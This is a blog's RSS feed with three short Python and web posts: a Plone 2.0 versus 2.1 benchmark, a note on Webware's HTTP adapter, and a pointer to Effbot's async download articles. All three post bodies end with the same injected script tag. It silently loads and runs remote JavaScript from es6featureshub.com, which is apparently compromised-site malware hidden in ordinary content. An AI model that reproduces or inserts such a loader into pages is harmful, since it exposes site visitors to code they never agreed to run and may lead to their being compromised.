<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Jkx@home &#187; http</title>
	<atom:link href="http://www.larsen-b.com/tags/http/feed" rel="self" type="application/rss+xml" />
	<link>http://www.larsen-b.com</link>
	<description>Titanium Exposé</description>
	<lastBuildDate>Fri, 31 Oct 2025 02:15:37 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5</generator>
		<item>
		<title>Ouch: Plone 2.0 vs Plone 2.1</title>
		<link>http://www.larsen-b.com/Article/217.html</link>
		<comments>http://www.larsen-b.com/Article/217.html#comments</comments>
		<pubDate>Tue, 27 Sep 2005 14:47:10 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Zope]]></category>
		<category><![CDATA[http]]></category>
		<category><![CDATA[Python]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[I run into a little test of Plone 2.1 today. And the whole stuff, seems to be slower than Plone 2.0.5. I decided to do a little benchmark, and yes Plone 2.1 seems to be really slower.. Plone 2.0.5 (python &#8230; <a href="http://www.larsen-b.com/Article/217.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>I run into a little test of <a class="reference" href="http://www.plone.org">Plone</a> 2.1 today. And the whole stuff, seems to be slower than Plone 2.0.5. I decided to do a little benchmark, and yes Plone 2.1 seems to be really slower..</p>
<p><em>Plone 2.0.5</em> (python 2.3.4)</p>
<pre class="literal-block">Total transferred:      239130 bytes
HTML transferred:       234620 bytes
Requests per second:    5.52 [#/sec] (mean)
Time per request:       181.261 [ms] (mean)
Time per request:       181.261 [ms] (mean, across all concurrent requests)
Transfer rate:          128.54 [Kbytes/sec] received</pre>
<p><em>Plone 2.1</em> (python 2.3.5)</p>
<pre class="literal-block">Total transferred:      240740 bytes
HTML transferred:       237440 bytes
Requests per second:    3.54 [#/sec] (mean)
Time per request:       282.476 [ms] (mean)
Time per request:       282.476 [ms] (mean, across all concurrent requests)
Transfer rate:          83.19 [Kbytes/sec] received</pre>
<p>Grr, here is two point to read:</p>
<ul class="simple">
<li>The 2.1 version is really slower look at the transfer rate..</li>
<li>But this is astomish <strong>slow</strong></li>
</ul>
<p>The bench was done on:</p>
<ul class="simple">
<li>pure zope httpd (no apache or squid frontend)</li>
<li>without debug enable</li>
<li>with default HTTPCache and RAMCache enable (default install setting)</li>
<li>a dual Xeon at 2.6Ghz with 1Go of RAM ! (I know python only use 1 CPU but !!!)</li>
</ul>
<p>I first think my setup is buggy, but no.. nobody with a good CMS in stock ?<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/217.html/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Webware HTTP Adapter</title>
		<link>http://www.larsen-b.com/Article/71.html</link>
		<comments>http://www.larsen-b.com/Article/71.html#comments</comments>
		<pubDate>Fri, 19 Dec 2003 06:25:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Webware]]></category>
		<category><![CDATA[http]]></category>
		<category><![CDATA[Python]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Ho, i miss it .. Yesterday, it tested the HttpAdapter for Webware. This is a nice, easy to use (no need to use the cgi or tweak the httpd.conf) Adapter for Webware. To test: Just copy the WebKit/Adapters/HTTPAdapter.py in your &#8230; <a href="http://www.larsen-b.com/Article/71.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>Ho, i miss it ..<br />
Yesterday, it tested the HttpAdapter for Webware. This is a nice, easy to use (no need to use the cgi or tweak the httpd.conf) Adapter for Webware.</p>
<p>To test: Just copy the WebKit/Adapters/HTTPAdapter.py in your current Webware instance, edit this file to feet w/ your need ( mainly the 2 first vars ), and run it directly.<br />
Now point your mozilla to <a class="reference" href="http://localhost:8080/">http://localhost:8080/</a> and enjoy :)</p>
<p>I haven&#8217;t play w/ Webware since a while.. and i don&#8217;t know the real difference between this and &#8216;Standalone Webkit&#8217; .. but this is pretty kool ..</p>
<p>Now i need to look at the URLHandler as Ian tell me..<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/71.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Medusa strikes back</title>
		<link>http://www.larsen-b.com/Article/31.html</link>
		<comments>http://www.larsen-b.com/Article/31.html#comments</comments>
		<pubDate>Fri, 24 Oct 2003 10:33:13 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[http]]></category>
		<category><![CDATA[Python]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[While I was thinking about some sync / async download for iAggregator (mainly to reduce the time needed to this), i remember that i&#8217;ve read it previously somewhere .. After a little search i have found this : http://effbot.org/zone/effnews-1.htm Perhaps &#8230; <a href="http://www.larsen-b.com/Article/31.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>While I was thinking about some sync / async download for iAggregator (mainly to reduce the time needed to this), i remember that i&#8217;ve read it previously somewhere .. After a little search i have found this : <a class="reference" href="http://effbot.org/zone/effnews-1.htm">http://effbot.org/zone/effnews-1.htm</a></p>
<p>Perhaps you don&#8217;t know the Effbot ? Python&#8217;s user should take a look at  <a class="reference" href="http://effbot.org/zone/">http://effbot.org/zone/</a> .<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/31.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
